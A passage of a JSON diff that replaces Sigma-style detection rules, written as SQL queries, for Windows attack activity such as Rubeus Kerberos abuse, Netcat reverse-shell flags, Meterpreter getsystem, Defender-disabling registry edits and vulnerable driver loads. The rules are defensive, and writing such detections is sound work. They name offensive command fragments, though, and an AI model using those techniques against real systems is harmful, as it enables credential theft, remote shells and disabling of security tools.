'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR 
CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": 
"Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' 
ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR 
(CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE 
'%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download 
Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. 
Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": 
"driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + 
"filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' 